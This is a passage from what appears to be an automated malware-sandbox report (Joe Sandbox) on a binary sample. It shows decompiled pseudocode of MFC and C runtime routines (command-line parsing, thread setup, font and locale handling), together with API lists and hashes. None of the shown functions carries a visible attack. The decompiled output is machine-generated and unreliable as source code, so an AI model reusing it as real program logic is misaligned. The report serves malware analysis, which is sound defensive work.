						while(E004289FF(_t227,  *((intOrPtr*)( *((intOrPtr*)(_t227 + 8)) + _t224 * 4)),  &_v268) == 0) {
							_t224 = _t224 + 1;
							if(_t224 <  *((intOrPtr*)(_t227 + 4)) - 1) {
								continue;
							} else {
								L8:
								while(_t224 > 0) {
									E004057D4( *((intOrPtr*)(_t227 + 8)) + _t224 * 4,  *((intOrPtr*)(_t227 + 8)) + _t224 * 4 - 4);
									_t224 = _t224 - 1;
									__eflags = _t224;
								}
								goto L9;
							}
							goto L8;
						}
						goto L8;
					}
					L9:
					_t171 = E00402830(_t220, _t224,  &_v268);
					_pop(_t225);
					_pop(_t229);
					return E00430650(_t171, _t181, _v8 ^ _t231, _t220, _t225, _t229);
				}
			}












































                  0x00426e96
                  0x00426e96
                  0x00426e96
                  0x00426e99
                  0x00426e9b
                  0x00426ea1
                  0x00426ea8
                  0x00426eab
                  0x00426eac
                  0x00426ead
                  0x00426eb0
                  0x00426eb4
                  0x00426f30
                  0x00426f32
                  0x00426f34
                  0x00426f36
                  0x00426f3b
                  0x00426f3c
                  0x00426f46
                  0x00426f4b
                  0x00426f50
                  0x00426f55
                  0x00426f57
                  0x00426f59
                  0x00426f5b
                  0x00426f5b
                  0x00426f60
                  0x00426f63
                  0x00426f66
                  0x00426f68
                  0x00426f6c
                  0x00426f6e
                  0x00426f70
                  0x00426f78
                  0x00426f78
                  0x00426f70
                  0x00426f80
                  0x00426f84
                  0x00426f87
                  0x00426fa5
                  0x00426fa8
                  0x00426fae
                  0x00426fb0
                  0x00426fb3
                  0x00426fb5
                  0x00426fc3
                  0x00426fc9
                  0x00426fca
                  0x00426fca
                  0x00426fb5
                  0x00426fd6
                  0x00426fdc
                  0x00426fe2
                  0x00426fe4
                  0x00426fea
                  0x00426fec
                  0x00426fff
                  0x00427001
                  0x00427009
                  0x00427010
                  0x00427016
                  0x0042701e
                  0x00427023
                  0x0042702d
                  0x00427032
                  0x00427039
                  0x0042703d
                  0x00427041
                  0x0042704f
                  0x0042706a
                  0x0042706d
                  0x0042706f
                  0x00000000
                  0x00000000
                  0x00427075
                  0x0042708c
                  0x004270d7
                  0x004270d7
                  0x004270d9
                  0x004270db
                  0x00000000
                  0x00000000
                  0x00427094
                  0x00427096
                  0x0042709e
                  0x0042709e
                  0x0042709e
                  0x004270a4
                  0x004270a4
                  0x004270ab
                  0x004270b1
                  0x004270b3
                  0x004270bd
                  0x004270c3
                  0x004270c5
                  0x004270c5
                  0x004270c5
                  0x004270ce
                  0x004270d4
                  0x004270d6
                  0x004270d6
                  0x004270d6
                  0x004270eb
                  0x004270ee
                  0x00427102
                  0x00427105
                  0x00427106
                  0x00427108
                  0x00427112
                  0x0042712b
                  0x0042712c
                  0x00000000
                  0x00427114
                  0x00427124
                  0x00427124
                  0x0042710a
                  0x0042710a
                  0x0042710b
                  0x00427131
                  0x00427136
                  0x00427136
                  0x0042713b
                  0x0042713e
                  0x00427141
                  0x0042714b
                  0x0042714e
                  0x00427151
                  0x00427157
                  0x0042715e
                  0x00427169
                  0x0042716a
                  0x00427171
                  0x00427172
                  0x00427176
                  0x0042717e
                  0x0042718f
                  0x0042719d
                  0x004271ab
                  0x004271af
                  0x004271b4
                  0x004271c0
                  0x004271c3
                  0x00427049
                  0x00000000
                  0x00427049
                  0x00000000
                  0x004271c3
                  0x0042704f
                  0x004271c9
                  0x004271cc
                  0x004271e1
                  0x004271e4
                  0x004271eb
                  0x004271f6
                  0x004271f9
                  0x004271f9
                  0x00426fec
                  0x00426fe4
                  0x00426f89
                  0x00426f89
                  0x00426f8b
                  0x00426f8e
                  0x00426f95
                  0x00426f95
                  0x00426f9e
                  0x00426f9e
                  0x00427203
                  0x00426ec4
                  0x00426ecc
                  0x00426ed4
                  0x00426ed9
                  0x00426edb
                  0x00426ef5
                  0x00426ef9
                  0x00000000
                  0x00426efb
                  0x00000000
                  0x00426f0d
                  0x00426f07
                  0x00426f0c
                  0x00426f0c
                  0x00426f0c
                  0x00000000
                  0x00426f0d
                  0x00000000
                  0x00426ef9
                  0x00000000
                  0x00426edb
                  0x00426f11
                  0x00426f1b
                  0x00426f23
                  0x00426f26
                  0x00426f2d
                  0x00426f2d

                  APIs
                  • lstrlenA.KERNEL32(?), ref: 00426EB7
                  • __EH_prolog3_GS.LIBCMT ref: 00426F46
                  • DeleteMenu.USER32(?,?,00000000,00000130,00000003,000000FF,00000000), ref: 00426FC3
                  • GetCurrentDirectoryA.KERNEL32(00000104,00000130,00000130,00000003,000000FF,00000000), ref: 00426FDC
                  • lstrlenA.KERNEL32(?), ref: 00426FF9
                  • swprintf.LIBCMT ref: 00427136
                    • Part of subcall function 004289FF: lstrcmpiA.KERNEL32(00000000,00000000,00000000,?), ref: 00428A24
                  • _strcpy_s.LIBCMT ref: 0042711E
                  • GetMenuItemCount.USER32 ref: 004271D2
                  Strings
                  Memory Dump Source
                  • Source File: 00000001.00000002.659116467.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                  • Associated: 00000001.00000002.659112623.0000000000400000.00000002.00020000.sdmp Download File
                  • Associated: 00000001.00000002.659156937.000000000044E000.00000002.00020000.sdmp Download File
                  • Associated: 00000001.00000002.659178064.0000000000462000.00000004.00020000.sdmp Download File
                  • Associated: 00000001.00000002.659187745.0000000000469000.00000002.00020000.sdmp Download File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_1_2_400000_YF4dF4w2Cr.jbxd
                  Similarity
                  • API ID: Menulstrlen$CountCurrentDeleteDirectoryH_prolog3_Item_strcpy_slstrcmpiswprintf
                  • String ID: %d $&%d $1&0 $\
                  • API String ID: 2973701184-2399880791
                  • Opcode ID: 7d7898fec5ad83dd7a4620e5ab9e50ae39bfbcd1c461751bf6efaa05cfe8ec2d
                  • Instruction ID: b6265fcdd1575fe5806665c5d52ca27f8be5779e5917fe7b4e9aef7305b3ac5e
                  • Opcode Fuzzy Hash: 7d7898fec5ad83dd7a4620e5ab9e50ae39bfbcd1c461751bf6efaa05cfe8ec2d
                  • Instruction Fuzzy Hash: 16B1D371A002259FCB20DF65DD80FEAB7B4EF08314F5041AEE55997292DB38AE94CF19
                  Uniqueness

                  Uniqueness Score: -1.00%

                  Function 00415151, Relevance: 21.1, APIs: 3, Strings: 11, Instructions: 123stringCOMMON
                  Download Yara Rule
                  C-Code - Quality: 94%
                  			E00415151(void* __ecx, CHAR* _a4) {
				int _t14;
				int _t15;
				void* _t16;
				void* _t17;
				void* _t18;
				void* _t20;
				void* _t21;
				void* _t22;
				void* _t23;
				CHAR* _t24;
				void* _t41;
				void* _t43;
				void* _t45;
				void* _t47;

				_t24 = _a4;
				_t47 = __ecx;
				_t14 = lstrcmpA(_t24, "pt");
				if(_t14 == 0) {
					 *((intOrPtr*)(_t47 + 0x14)) = 3;
					return _t14;
				}
				_t15 = lstrcmpA(_t24, "p");
				if(_t15 == 0) {
					 *((intOrPtr*)(_t47 + 0x14)) = 2;
					return _t15;
				}
				_t16 = E0040D6F3(_t24, "Register");
				if(_t16 == 0) {
					L22:
					 *((intOrPtr*)(_t47 + 0x14)) = 5;
					return _t16;
				}
				_t16 = E0040D6F3(_t24, "Regserver");
				if(_t16 == 0) {
					goto L22;
				}
				_t16 = E0040D6F3(_t24, "RegisterPerUser");
				if(_t16 == 0) {
					L21:
					 *((intOrPtr*)(_t47 + 0x10)) = 1;
					goto L22;
				}
				_t16 = E0040D6F3(_t24, "RegserverPerUser");
				if(_t16 == 0) {
					goto L21;
				}
				_t17 = E0040D6F3(_t24, "Unregister");
				if(_t17 == 0) {
					L20:
					 *((intOrPtr*)(_t47 + 0x14)) = 6;
					return _t17;
				}
				_t17 = E0040D6F3(_t24, "Unregserver");
				if(_t17 == 0) {
					goto L20;
				}
				_t18 = E0040D6F3(_t24, "UnregisterPerUser");
				if(_t18 == 0) {
					L19:
					 *((intOrPtr*)(_t47 + 0x14)) = 6;
					 *((intOrPtr*)(_t47 + 0x10)) = 1;
					return _t18;
				}
				_t18 = E0040D6F3(_t24, "UnregserverPerUser");
				_pop(_t41);
				if(_t18 == 0) {
					goto L19;
				}
				if(lstrcmpA(_t24, "dde") == 0) {
					_t23 = E00423E10(_t41, _t19);
					 *((intOrPtr*)(_t47 + 0x14)) = 4;
					return _t23;
				}
				_t20 = E0040D6F3(_t24, "Embedding");
				_pop(_t43);
				if(_t20 == 0) {
					_t22 = E00423E10(_t43, _t20);
					 *((intOrPtr*)(_t47 + 8)) = 1;
					L16:
					 *(_t47 + 4) =  *(_t47 + 4) & 0x00000000;
					return _t22;
				}
				_t21 = E0040D6F3(_t24, "Automation");
				_pop(_t45);
				if(_t21 == 0) {
					_t22 = E00423E10(_t45, _t21);
					 *((intOrPtr*)(_t47 + 0xc)) = 1;
					goto L16;
				}
				return _t21;
			}

















                  0x00415157
                  0x00415168
                  0x0041516a
                  0x0041516e
                  0x00415170
                  0x00000000
                  0x00415170
                  0x00415182
                  0x00415186
                  0x00415188
                  0x00000000
                  0x00415188
                  0x0041519a
                  0x004151a3
                  0x004152b3
                  0x004152b3
                  0x00000000
                  0x004152b3
                  0x004151af
                  0x004151b8
                  0x00000000
                  0x00000000
                  0x004151c4
                  0x004151cd
                  0x004152ac
                  0x004152ac
                  0x00000000
                  0x004152ac
                  0x004151d9
                  0x004151e2
                  0x00000000
                  0x00000000
                  0x004151ee
                  0x004151f7
                  0x004152a3
                  0x004152a3
                  0x00000000
                  0x004152a3
                  0x00415203
                  0x0041520c
                  0x00000000
                  0x00000000
                  0x00415218
                  0x00415221
                  0x00415293
                  0x00415293
                  0x0041529a
                  0x00000000
                  0x0041529a
                  0x00415229
                  0x0041522f
                  0x00415232
                  0x00000000
                  0x00000000
                  0x0041523e
                  0x00415241
                  0x00415246
                  0x00000000
                  0x00415246
                  0x00415255
                  0x0041525b
                  0x0041525e
                  0x00415261
                  0x00415266
                  0x0041526d
                  0x0041526d
                  0x00000000
                  0x0041526d
                  0x00415279
                  0x0041527f
                  0x00415282
                  0x00415285
                  0x0041528a
                  0x00000000
                  0x0041528a
                  0x004152be

                  APIs
                  • lstrcmpA.KERNEL32(?,00451CF8), ref: 0041516A
                  • lstrcmpA.KERNEL32(?,00451CF4), ref: 00415182
                  Strings
                  Memory Dump Source
                  • Source File: 00000001.00000002.659116467.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                  • Associated: 00000001.00000002.659112623.0000000000400000.00000002.00020000.sdmp Download File
                  • Associated: 00000001.00000002.659156937.000000000044E000.00000002.00020000.sdmp Download File
                  • Associated: 00000001.00000002.659178064.0000000000462000.00000004.00020000.sdmp Download File
                  • Associated: 00000001.00000002.659187745.0000000000469000.00000002.00020000.sdmp Download File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_1_2_400000_YF4dF4w2Cr.jbxd
                  Similarity
                  • API ID: lstrcmp
                  • String ID: Automation$Embedding$Register$RegisterPerUser$Regserver$RegserverPerUser$Unregister$UnregisterPerUser$Unregserver$UnregserverPerUser$dde
                  • API String ID: 1534048567-3876351261
                  • Opcode ID: 9d3d5de904741c47644dff931f87209fb8385c58037a0fa5dc1866a977703a3c
                  • Instruction ID: bacbe481972acab002e41af3f2ad9a35167e3d19faef8bf490c2dd1adb14a177
                  • Opcode Fuzzy Hash: 9d3d5de904741c47644dff931f87209fb8385c58037a0fa5dc1866a977703a3c
                  • Instruction Fuzzy Hash: C231C373544F02A5E2246E76ED02BD722DC6B5176AF20081FF806A66C3DFFED588496C
                  Uniqueness

                  Uniqueness Score: -1.00%

                  Function 00416443, Relevance: 21.1, APIs: 14, Instructions: 99synchronizationthreadinjectionCOMMON
                  Download Yara Rule
                  C-Code - Quality: 100%
                  			E00416443(intOrPtr __ecx, void* __edx, signed int _a4, intOrPtr _a8, intOrPtr _a12) {
				signed int _v8;
				void* _v12;
				void* _v16;
				signed int _v24;
				intOrPtr _v28;
				char _v32;
				void* __ebx;
				void* __edi;
				void* __esi;
				void* __ebp;
				void* _t43;
				void* _t59;
				void* _t60;
				intOrPtr _t64;

				_t59 = __edx;
				_t64 = __ecx;
				_t69 =  *((intOrPtr*)(__ecx + 0x2c));
				if( *((intOrPtr*)(__ecx + 0x2c)) != 0) {
					E00406436(0, __ecx, _t60, __ecx, _t69);
				}
				E00431160(_t60,  &_v32, 0, 0x1c);
				_v32 = E0041EDAB(0, _t60, _t64, _t69);
				_v28 = _t64;
				_v16 = CreateEventA(0, 1, 0, 0);
				_v12 = CreateEventA(0, 1, 0, 0);
				_t37 = _a4;
				_v24 = _a4;
				if(_v16 == 0) {
					L12:
					__eflags = _v12;
					if(_v12 == 0) {
						goto L14;
					}
					goto L13;
				} else {
					if(_v12 == 0) {
						CloseHandle(_v16);
						goto L12;
					}
					_t43 = E00433E25(_t59, _t64, _a12, _a8, E00416327,  &_v32, _t37 | 0x00000004, _t64 + 0x30);
					 *(_t64 + 0x2c) = _t43;
					if(_t43 != 0) {
						ResumeThread(_t43);
						WaitForSingleObject(_v16, 0xffffffff);
						CloseHandle(_v16);
						__eflags = _a4 & 0x00000004;
						if((_a4 & 0x00000004) != 0) {
							SuspendThread( *(_t64 + 0x2c));
						}
						__eflags = _v8;
						if(_v8 == 0) {
							SetEvent(_v12);
							return 1;
						} else {
							WaitForSingleObject( *(_t64 + 0x2c), 0xffffffff);
							CloseHandle( *(_t64 + 0x2c));
							 *(_t64 + 0x2c) = 0;
							L13:
							CloseHandle(_v12);
							L14:
							return 0;
						}
					}
					CloseHandle(_v16);
					CloseHandle(_v12);
					goto L14;
				}
			}

















                  0x00416443
                  0x0041644d
                  0x00416452
                  0x00416455
                  0x00416457
                  0x00416457
                  0x00416463
                  0x0041647b
                  0x0041647e
                  0x00416488
                  0x00416493
                  0x00416496
                  0x00416499
                  0x0041649f
                  0x0041653b
                  0x0041653b
                  0x0041653e
                  0x00000000
                  0x00000000
                  0x00000000
                  0x004164a5
                  0x004164a8
                  0x00416539
                  0x00000000
                  0x00416539
                  0x004164c5
                  0x004164cd
                  0x004164d2
                  0x004164e3
                  0x004164ee
                  0x004164fd
                  0x004164ff
                  0x00416503
                  0x00416508
                  0x00416508
                  0x0041650e
                  0x00416511
                  0x0041652b
                  0x00000000
                  0x00416513
                  0x00416518
                  0x00416521
                  0x00416523
                  0x00416540
                  0x00416543
                  0x00416545
                  0x00000000
                  0x00416545
                  0x00416511
                  0x004164d9
                  0x004164de
                  0x00000000
                  0x004164de

                  APIs
                  • _memset.LIBCMT ref: 00416463
                  • CreateEventA.KERNEL32(00000000,00000001,00000000,00000000), ref: 00416481
                  • CreateEventA.KERNEL32(00000000,00000001,00000000,00000000), ref: 0041648B
                  • CloseHandle.KERNEL32(?), ref: 004164D9
                  • CloseHandle.KERNEL32(?), ref: 004164DE
                    • Part of subcall function 00406436: __CxxThrowException@8.LIBCMT ref: 0040644C
                    • Part of subcall function 00406436: __EH_prolog3.LIBCMT ref: 00406459
                  • ResumeThread.KERNEL32(00000000), ref: 004164E3
                  • WaitForSingleObject.KERNEL32(?,000000FF), ref: 004164EE
                  • CloseHandle.KERNEL32(?), ref: 004164FD
                  • SuspendThread.KERNEL32(?), ref: 00416508
                  • WaitForSingleObject.KERNEL32(?,000000FF), ref: 00416518
                  • CloseHandle.KERNEL32(?), ref: 00416521
                  • SetEvent.KERNEL32(00000004), ref: 0041652B
                  • CloseHandle.KERNEL32(?), ref: 00416543
                  Memory Dump Source
                  • Source File: 00000001.00000002.659116467.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                  • Associated: 00000001.00000002.659112623.0000000000400000.00000002.00020000.sdmp Download File
                  • Associated: 00000001.00000002.659156937.000000000044E000.00000002.00020000.sdmp Download File
                  • Associated: 00000001.00000002.659178064.0000000000462000.00000004.00020000.sdmp Download File
                  • Associated: 00000001.00000002.659187745.0000000000469000.00000002.00020000.sdmp Download File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_1_2_400000_YF4dF4w2Cr.jbxd
                  Similarity
                  • API ID: CloseHandle$Event$CreateObjectSingleThreadWait$Exception@8H_prolog3ResumeSuspendThrow_memset
                  • String ID:
                  • API String ID: 2577798173-0
                  • Opcode ID: 2b12f44261b0e700d1cb254170418ee1016ff70137ee5d9583ddda4daff69bfd
                  • Instruction ID: 0ba4b3701773fc9ac83d28f7e8eab003c92724f4a67e4e5f2fa9819084e5fd14
                  • Opcode Fuzzy Hash: 2b12f44261b0e700d1cb254170418ee1016ff70137ee5d9583ddda4daff69bfd
                  • Instruction Fuzzy Hash: 24316E72C00209BFDB11AFA5DC848AEBBBAFF48354F11857AF911A2160D7359A819F58
                  Uniqueness

                  Uniqueness Score: -1.00%

                  Function 00436018, Relevance: 21.1, APIs: 8, Strings: 4, Instructions: 57libraryloaderCOMMONLIBRARYCODE
                  Download Yara Rule
                  C-Code - Quality: 92%
                  			E00436018(void* __ebx, void* __edi, void* __esi, void* __eflags) {
				struct HINSTANCE__* _t23;
				intOrPtr _t28;
				intOrPtr _t32;
				intOrPtr _t45;
				void* _t46;

				_t35 = __ebx;
				_push(0xc);
				_push(0x45e180);
				E00431818(__ebx, __edi, __esi);
				_t44 = L"KERNEL32.DLL";
				_t23 = GetModuleHandleW(L"KERNEL32.DLL");
				if(_t23 == 0) {
					_t23 = E0043392F(_t44);
				}
				 *(_t46 - 0x1c) = _t23;
				_t45 =  *((intOrPtr*)(_t46 + 8));
				 *((intOrPtr*)(_t45 + 0x5c)) = 0x456080;
				 *((intOrPtr*)(_t45 + 0x14)) = 1;
				if(_t23 != 0) {
					_t35 = GetProcAddress;
					 *((intOrPtr*)(_t45 + 0x1f8)) = GetProcAddress(_t23, "EncodePointer");
					 *((intOrPtr*)(_t45 + 0x1fc)) = GetProcAddress( *(_t46 - 0x1c), "DecodePointer");
				}
				 *((intOrPtr*)(_t45 + 0x70)) = 1;
				 *((char*)(_t45 + 0xc8)) = 0x43;
				 *((char*)(_t45 + 0x14b)) = 0x43;
				 *(_t45 + 0x68) = 0x463620;
				E0043A0BF(_t35, 0xd);
				 *(_t46 - 4) =  *(_t46 - 4) & 0x00000000;
				InterlockedIncrement( *(_t45 + 0x68));
				 *(_t46 - 4) = 0xfffffffe;
				E004360ED();
				E0043A0BF(_t35, 0xc);
				 *(_t46 - 4) = 1;
				_t28 =  *((intOrPtr*)(_t46 + 0xc));
				 *((intOrPtr*)(_t45 + 0x6c)) = _t28;
				if(_t28 == 0) {
					_t32 =  *0x463c28; // 0x25e10f8
					 *((intOrPtr*)(_t45 + 0x6c)) = _t32;
				}
				E00439086( *((intOrPtr*)(_t45 + 0x6c)));
				 *(_t46 - 4) = 0xfffffffe;
				return E0043185D(E004360F6());
			}








                  0x00436018
                  0x00436018
                  0x0043601a
                  0x0043601f
                  0x00436024
                  0x0043602a
                  0x00436032
                  0x00436035
                  0x0043603a
                  0x0043603b
                  0x0043603e
                  0x00436041
                  0x0043604b
                  0x00436050
                  0x00436058
                  0x00436060
                  0x00436070
                  0x00436070
                  0x00436076
                  0x00436079
                  0x00436080
                  0x00436087
                  0x00436090
                  0x00436096
                  0x0043609d
                  0x004360a3
                  0x004360aa
                  0x004360b1
                  0x004360b7
                  0x004360ba
                  0x004360bd
                  0x004360c2
                  0x004360c4
                  0x004360c9
                  0x004360c9
                  0x004360cf
                  0x004360d5
                  0x004360e6

                  APIs
                  • GetModuleHandleW.KERNEL32(KERNEL32.DLL,0045E180,0000000C,00436153,00000000,00000000,?,?,18EAB29F), ref: 0043602A
                  • __crt_waiting_on_module_handle.LIBCMT ref: 00436035
                    • Part of subcall function 0043392F: Sleep.KERNEL32(000003E8,00000000,?,00435F3E,KERNEL32.DLL,?,00435FAA,?,?,18EAB29F), ref: 0043393B
                    • Part of subcall function 0043392F: GetModuleHandleW.KERNEL32(?,?,00435F3E,KERNEL32.DLL,?,00435FAA,?,?,18EAB29F), ref: 00433944
                  • GetProcAddress.KERNEL32(00000000,EncodePointer), ref: 0043605E
                  • GetProcAddress.KERNEL32(?,DecodePointer), ref: 0043606E
                  • __lock.LIBCMT ref: 00436090
                  • InterlockedIncrement.KERNEL32(00463620), ref: 0043609D
                  • __lock.LIBCMT ref: 004360B1
                  • ___addlocaleref.LIBCMT ref: 004360CF
                  Strings
                  Memory Dump Source
                  • Source File: 00000001.00000002.659116467.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                  • Associated: 00000001.00000002.659112623.0000000000400000.00000002.00020000.sdmp Download File
                  • Associated: 00000001.00000002.659156937.000000000044E000.00000002.00020000.sdmp Download File
                  • Associated: 00000001.00000002.659178064.0000000000462000.00000004.00020000.sdmp Download File
                  • Associated: 00000001.00000002.659187745.0000000000469000.00000002.00020000.sdmp Download File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_1_2_400000_YF4dF4w2Cr.jbxd
                  Similarity
                  • API ID: AddressHandleModuleProc__lock$IncrementInterlockedSleep___addlocaleref__crt_waiting_on_module_handle
                  • String ID: 6F$DecodePointer$EncodePointer$KERNEL32.DLL
                  • API String ID: 1028249917-1974163033
                  • Opcode ID: 2938ef12c040f176a8b5a28532755f9678e071b691cd56c04785de8a37628ebe
                  • Instruction ID: e4dbea44d3e701bfa2a05fd5f39e00ef826fe1f2e1bb3cd6cc1662b80f67c0e6
                  • Opcode Fuzzy Hash: 2938ef12c040f176a8b5a28532755f9678e071b691cd56c04785de8a37628ebe
                  • Instruction Fuzzy Hash: 4311A271940B01AAD724EF76D802B5EBBF0EF09315F10952FE899973A1CB789A448F1D
                  Uniqueness

                  Uniqueness Score: -1.00%

                  Function 0042D0D6, Relevance: 19.6, APIs: 13, Instructions: 137COMMON
                  Download Yara Rule
                  C-Code - Quality: 84%
                  			E0042D0D6(void* __ebx, intOrPtr* __ecx, void* __edx, void* __edi) {
				signed int _v8;
				struct tagLOGFONTA _v68;
				struct tagSIZE _v76;
				struct tagSIZE _v84;
				void* _v88;
				int _v92;
				int _v96;
				struct tagTEXTMETRICA _v152;
				void* __esi;
				signed int _t65;
				long _t73;
				void* _t82;
				signed int _t86;
				signed int _t87;
				void* _t112;
				int _t116;
				void* _t118;
				void* _t121;
				void** _t122;
				signed int _t124;
				signed int _t126;

				_t113 = __edi;
				_t112 = __edx;
				_t104 = __ebx;
				_t124 = _t126;
				_t65 =  *0x463404; // 0x18eab29f
				_t66 = _t65 ^ _t124;
				_v8 = _t65 ^ _t124;
				_t120 = __ecx;
				if( *(__ecx + 8) != 0) {
					_t66 =  *(__ecx + 0x2c);
					if(_t66 != 0) {
						if( *((intOrPtr*)(__ecx + 4)) != 0) {
							_push(__ebx);
							_push(__edi);
							GetObjectA(_t66, 0x3c,  &_v68);
							GetTextFaceA( *(__ecx + 8), 0x20,  &(_v68.lfFaceName));
							GetTextMetricsA( *(__ecx + 8),  &_v152);
							_t73 = _v152.tmHeight;
							if(_t73 >= 0) {
								_v68.lfHeight = _v152.tmInternalLeading - _t73;
							} else {
								_v68.lfHeight = _t73;
							}
							_v68.lfWidth = _v152.tmAveCharWidth;
							_v68.lfWeight = _v152.tmWeight;
							_v68.lfItalic = _v152.tmItalic;
							_v68.lfUnderline = _v152.tmUnderlined;
							_v68.lfStrikeOut = _v152.tmStruckOut;
							_v68.lfCharSet = _v152.tmCharSet;
							_v68.lfPitchAndFamily = _v152.tmPitchAndFamily;
							_t82 = CreateFontIndirectA( &_v68);
							_v88 = _t82;
							SelectObject( *(_t120 + 4), _t82);
							GetTextMetricsA( *(_t120 + 4),  &_v152);
							_t86 = _v152.tmHeight;
							_t116 =  ~(_v68.lfHeight);
							if(_t86 >= 0) {
								_t87 = _t86 - _v152.tmInternalLeading;
							} else {
								_t87 =  ~_t86;
							}
							_v92 = _t87;
							GetWindowExtEx( *(_t120 + 4),  &_v76);
							GetViewportExtEx( *(_t120 + 4),  &_v84);
							if(_v76.cy < 0) {
								_v76.cy =  ~(_v76.cy);
							}
							if(_v84.cy < 0) {
								_v84.cy =  ~(_v84.cy);
							}
							_v96 = MulDiv(_t116, _v84.cy, _v76.cy);
							if(_v96 >= MulDiv(_v92, _v84.cy, _v76.cy)) {
								_t118 = _v88;
							} else {
								_v68.lfPitchAndFamily = (_v68.lfPitchAndFamily & 0 | (_v68.lfPitchAndFamily & 0x000000f0) != 0x00000050) - 0x00000001 & 0x00000050;
								_v68.lfFaceName = 0;
								_t118 = CreateFontIndirectA( &_v68);
								SelectObject( *(_t120 + 4), _t118);
								DeleteObject(_v88);
							}
							_t122 = _t120 + 0x28;
							_t66 = E0041FCF2(_t122);
							 *_t122 = _t118;
							_pop(_t113);
							_pop(_t104);
						}
					} else {
						_push(0xe);
						_t66 =  *((intOrPtr*)( *__ecx + 0x24))();
					}
				}
				_pop(_t121);
				return E00430650(_t66, _t104, _v8 ^ _t124, _t112, _t113, _t121);
			}
























                  0x0042d0d6
                  0x0042d0d6
                  0x0042d0d6
                  0x0042d0d9
                  0x0042d0e1
                  0x0042d0e6
                  0x0042d0e8
                  0x0042d0ec
                  0x0042d0f2
                  0x0042d0f8
                  0x0042d0fd
                  0x0042d10f
                  0x0042d115
                  0x0042d116
                  0x0042d11e
                  0x0042d12d
                  0x0042d143
                  0x0042d145
                  0x0042d14d
                  0x0042d15c
                  0x0042d14f
                  0x0042d14f
                  0x0042d14f
                  0x0042d168
                  0x0042d16e
                  0x0042d174
                  0x0042d17a
                  0x0042d180
                  0x0042d186
                  0x0042d18c
                  0x0042d193
                  0x0042d199
                  0x0042d19c
                  0x0042d1ac
                  0x0042d1b1
                  0x0042d1b7
                  0x0042d1bb
                  0x0042d1c1
                  0x0042d1bd
                  0x0042d1bd
                  0x0042d1bd
                  0x0042d1c7
                  0x0042d1d1
                  0x0042d1de
                  0x0042d1e8
                  0x0042d1ea
                  0x0042d1ea
                  0x0042d1f1
                  0x0042d1f3
                  0x0042d1f3
                  0x0042d208
                  0x0042d216
                  0x0042d24a
                  0x0042d218
                  0x0042d226
                  0x0042d22d
                  0x0042d233
                  0x0042d239
                  0x0042d242
                  0x0042d242
                  0x0042d24d
                  0x0042d251
                  0x0042d256
                  0x0042d258
                  0x0042d259
                  0x0042d259
                  0x0042d0ff
                  0x0042d101
                  0x0042d103
                  0x0042d103
                  0x0042d0fd
                  0x0042d25f
                  0x0042d266

                  APIs
                  • GetObjectA.GDI32(?,0000003C,?), ref: 0042D11E
                  • GetTextFaceA.GDI32(00000000,00000020,?), ref: 0042D12D
                  • GetTextMetricsA.GDI32(00000000,?), ref: 0042D143
                  • CreateFontIndirectA.GDI32(?), ref: 0042D193
                  • SelectObject.GDI32(00000000,00000000), ref: 0042D19C
                  • GetTextMetricsA.GDI32(00000000,?), ref: 0042D1AC
                  • GetWindowExtEx.GDI32(00000000,?), ref: 0042D1D1
                  • GetViewportExtEx.GDI32(00000000,?), ref: 0042D1DE
                  • MulDiv.KERNEL32(?,00000000,00000000), ref: 0042D203
                  • MulDiv.KERNEL32(?,00000000,00000000), ref: 0042D211
                  • CreateFontIndirectA.GDI32(?), ref: 0042D231
                  • SelectObject.GDI32(00000000,00000000), ref: 0042D239
                  Memory Dump Source
                  • Source File: 00000001.00000002.659116467.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                  • Associated: 00000001.00000002.659112623.0000000000400000.00000002.00020000.sdmp Download File
                  • Associated: 00000001.00000002.659156937.000000000044E000.00000002.00020000.sdmp Download File
                  • Associated: 00000001.00000002.659178064.0000000000462000.00000004.00020000.sdmp Download File
                  • Associated: 00000001.00000002.659187745.0000000000469000.00000002.00020000.sdmp Download File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_1_2_400000_YF4dF4w2Cr.jbxd
                  Similarity
                  • API ID: ObjectText$CreateFontIndirectMetricsSelect$FaceViewportWindow
                  • String ID:
                  • API String ID: 4277312469-0
                  • Opcode ID: 46c90baf14463cde0e743273ea8f5b1da7676210bc4cae94f4770b9c8b14f1b6
                  • Instruction ID: 782ba5df95f801dfe7796d8664102e7f783a38d20a5401a22cb6488579e2bdbf
                  • Opcode Fuzzy Hash: 46c90baf14463cde0e743273ea8f5b1da7676210bc4cae94f4770b9c8b14f1b6
                  • Instruction Fuzzy Hash: 70513235A00268DFDF118FA5DD45AEEBBB9FF59300F10406AE859A6211D734AD46CF28
                  Uniqueness

                  Uniqueness Score: -1.00%

                  Function 004489F0, Relevance: 19.3, APIs: 9, Strings: 2, Instructions: 49COMMON
                  Download Yara Rule
                  C-Code - Quality: 86%
                  			E004489F0(void* __ebx, void* __edx, void* __edi, void* __esi, void* __eflags) {
				intOrPtr _t18;
				void* _t23;
				void* _t39;
				intOrPtr _t43;
				void* _t44;

				_t39 = __edx;
				_t29 = __ebx;
				_push(0x14);
				E00431A9B(E0044CC9D, __ebx, __edi, __esi);
				E00448F7B(_t44 - 0x14, 0);
				_t43 =  *0x46743c; // 0x25e10d8
				 *(_t44 - 4) =  *(_t44 - 4) & 0x00000000;
				 *((intOrPtr*)(_t44 - 0x10)) = _t43;
				_t18 = E00447826( *((intOrPtr*)(_t44 + 8)), E00447732(0x467554));
				_t41 = _t18;
				if(_t18 == 0) {
					if(_t43 == 0) {
						_push( *((intOrPtr*)(_t44 + 8)));
						_push(_t44 - 0x10);
						_t23 = E004485F1(__ebx, _t41, _t43, __eflags);
						__eflags = _t23 - 0xffffffff;
						if(_t23 == 0xffffffff) {
							E00430C66(_t44 - 0x20, "bad cast");
							E00430CF4(_t44 - 0x20, 0x45e790);
						}
						_t41 =  *((intOrPtr*)(_t44 - 0x10));
						 *0x46743c =  *((intOrPtr*)(_t44 - 0x10));
						E00447769( *((intOrPtr*)(_t44 - 0x10)));
						E0044911C(_t29, _t39, _t41, _t43, _t41);
					} else {
						_t41 = _t43;
					}
